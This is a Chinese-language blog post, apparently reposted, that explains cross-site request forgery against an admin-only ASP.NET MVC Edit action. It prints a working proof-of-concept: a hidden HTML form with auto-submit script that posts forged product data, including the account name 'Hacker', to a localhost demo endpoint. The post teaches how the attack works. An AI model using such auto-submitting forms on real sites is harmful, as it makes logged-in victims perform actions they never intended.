跨站請求偽造CSRF(Cross-site request forgery)

来源:http://www.cnblogs.com/LittleFeiHu/archive/2017/04/04/6666520.html
-Advertisement-
Play Games

CSRF(Cross-site request forgery)跨站請求偽造,也被稱為“One Click Attack”或者Session Riding,通常縮寫為CSRF或者XSRF,是一種對網站的惡意利用 一般被攻擊步驟: 1.登錄受信任網站A,併在本地生成Cookie。 2.在不登出A的情況 ...


CSRF(Cross-site request forgery)跨站請求偽造,也被稱為“One Click Attack”或者Session Riding,通常縮寫為CSRF或者XSRF,是一種對網站的惡意利用

一般被攻擊步驟:

1.登錄受信任網站A,併在本地生成Cookie。  

2.在不登出A的情況下,訪問危險網站B。

所以沒事的時候不要亂點鏈接不是隨便說著玩的。

 

常見場景分析:

假設你有一個這樣的Action,因為已經加了[Authorize(Roles = "Admins")]標記,所以只有管理員角色才可以提交數據

[HttpPost]
[Authorize(Roles = "Admins")]
public ActionResult Edit(ProductDetails productdetails)
{
    if (ModelState.IsValid)
    {
        db.Entry(productdetails).State = EntityState.Modified;
        db.SaveChanges();
        return RedirectToAction("Index");
    }
    return View(productdetails);
} 

非管理員訪問這個請求會被重定向到登錄頁,目前來看還是相對安全的。

 那麼假設有一個管理員已經登錄了網站,就是說上面的第一步已經完成,

坐等第二步,第二步 如何實現呢,其實很簡單,

一個惡意分子 模擬了這個表單提交,並且把這個表單放到了一個惡意網站下麵,

如果上面的網站管理員碰巧點了這個鏈接(比如收到一個惡意郵件,諸如此類),惡意鏈接被點開並載入以後,

那麼這個時候上面的Edit 請求就被管理員無意識的觸發了,

第二步操作完成,攻擊成功。

<form name="csrfhackForm" method="post"
    action="http://localhost:63577/ProductDetails/Edit">
    <input type="hidden" name="Id" value="1" />
    <input type="hidden" name="LicenseCount" value="5" />
    <input type="hidden" name="LicenseUsedCount" value="1" />
    <input type="hidden" name="AccountUserName" value="Hacker" />
    <input type="hidden" name="ProductName" value="B2B Product 101" />
</form>
<script type="text/javascript">
    document.csrfhackForm.submit();
</script> 

 

 http://www.devcurry.com/2013/01/what-is-antiforgerytoken-and-why-do-i.html

 


您的分享是我們最大的動力!

-Advertisement-
Play Games
更多相關文章
  • 由於redhat 的更新包只對註冊的用戶生效,所以需要自己手動更改成CentOS 的更新包, CentOS幾乎和redhat是一樣的,所以無需擔心軟體包是否可安裝,下麵是安裝步驟。 ...
  • 題目非常簡單,rand是偽隨機的,沒有種子。所以直接自己看下rand的第一個是啥然後和deadbeaf異或一下就行了。 ...
  • 最近在做freeradius的高可用配置,使用lvs的vip做輪詢: freeradius的配置見前面的文章; 下麵是lvs的keepalived的配置: global_defs { router_id LVS_DEVEL_TEST } vrrp_sync_group LVS_RA { group ...
  • 1、安裝 npm install pm2 -gd 2、啟動 pm2 start ./bin/www 3、pm2 save 4、pm2 startup 5、pm2 save 註:上面幾個步驟有幾個坑: 1、從第二步開始,要進入root許可權操作。不同用戶下的pm2 list 是不同的; 2、還是第二步, ...
  • 作為一隻linux菜的不能更菜的鳥,在linux前臺運行了一個服務後,我必須退出後才能執行其他命令,可是我的服務需要一直運行,於是我同事就給我在該命令後加了">/dev/null 2>&1"據說是這條命令就可以轉向後臺了,我在網上搜索了一下總體意思就是“用來避免shell命令或者程式等運行中有內容輸 ...
  • 時光飛逝,轉眼已經畢業快2年了,覺得自己學的東西多卻不精。對此深深的思考一下,覺得有必要連載unix環境編程文章,以此激勵自己學習。在此立貼為證,2天一篇博客從零開始闡述unix的環境編程。 參考書籍UNIX環境高級編程第三版 ...
  • 1。首先下載安裝vmware 12 pro ,將VT打開(虛擬功能,以前安裝過虛擬機點的同學可忽略)。 2。下載mac ox 10.12正式版鏡像文件(cdr尾碼)。 3。下載Unlocker208(vmware12安裝mac os的補丁)。 開始安裝:① 安裝好vmware 12 pro 後,關閉 ...
  • http://www.pwnable.kr/ 逆向題目,upx脫殼: 找到flag: ...
一周排行
    -Advertisement-
    Play Games
  • 移動開發(一):使用.NET MAUI開發第一個安卓APP 對於工作多年的C#程式員來說,近來想嘗試開發一款安卓APP,考慮了很久最終選擇使用.NET MAUI這個微軟官方的框架來嘗試體驗開發安卓APP,畢竟是使用Visual Studio開發工具,使用起來也比較的順手,結合微軟官方的教程進行了安卓 ...
  • 前言 QuestPDF 是一個開源 .NET 庫,用於生成 PDF 文檔。使用了C# Fluent API方式可簡化開發、減少錯誤並提高工作效率。利用它可以輕鬆生成 PDF 報告、發票、導出文件等。 項目介紹 QuestPDF 是一個革命性的開源 .NET 庫,它徹底改變了我們生成 PDF 文檔的方 ...
  • 項目地址 項目後端地址: https://github.com/ZyPLJ/ZYTteeHole 項目前端頁面地址: ZyPLJ/TreeHoleVue (github.com) https://github.com/ZyPLJ/TreeHoleVue 目前項目測試訪問地址: http://tree ...
  • 話不多說,直接開乾 一.下載 1.官方鏈接下載: https://www.microsoft.com/zh-cn/sql-server/sql-server-downloads 2.在下載目錄中找到下麵這個小的安裝包 SQL2022-SSEI-Dev.exe,運行開始下載SQL server; 二. ...
  • 前言 隨著物聯網(IoT)技術的迅猛發展,MQTT(消息隊列遙測傳輸)協議憑藉其輕量級和高效性,已成為眾多物聯網應用的首選通信標準。 MQTTnet 作為一個高性能的 .NET 開源庫,為 .NET 平臺上的 MQTT 客戶端與伺服器開發提供了強大的支持。 本文將全面介紹 MQTTnet 的核心功能 ...
  • Serilog支持多種接收器用於日誌存儲,增強器用於添加屬性,LogContext管理動態屬性,支持多種輸出格式包括純文本、JSON及ExpressionTemplate。還提供了自定義格式化選項,適用於不同需求。 ...
  • 目錄簡介獲取 HTML 文檔解析 HTML 文檔測試參考文章 簡介 動態內容網站使用 JavaScript 腳本動態檢索和渲染數據,爬取信息時需要模擬瀏覽器行為,否則獲取到的源碼基本是空的。 本文使用的爬取步驟如下: 使用 Selenium 獲取渲染後的 HTML 文檔 使用 HtmlAgility ...
  • 1.前言 什麼是熱更新 游戲或者軟體更新時,無需重新下載客戶端進行安裝,而是在應用程式啟動的情況下,在內部進行資源或者代碼更新 Unity目前常用熱更新解決方案 HybridCLR,Xlua,ILRuntime等 Unity目前常用資源管理解決方案 AssetBundles,Addressable, ...
  • 本文章主要是在C# ASP.NET Core Web API框架實現向手機發送驗證碼簡訊功能。這裡我選擇是一個互億無線簡訊驗證碼平臺,其實像阿裡雲,騰訊雲上面也可以。 首先我們先去 互億無線 https://www.ihuyi.com/api/sms.html 去註冊一個賬號 註冊完成賬號後,它會送 ...
  • 通過以下方式可以高效,並保證數據同步的可靠性 1.API設計 使用RESTful設計,確保API端點明確,並使用適當的HTTP方法(如POST用於創建,PUT用於更新)。 設計清晰的請求和響應模型,以確保客戶端能夠理解預期格式。 2.數據驗證 在伺服器端進行嚴格的數據驗證,確保接收到的數據符合預期格 ...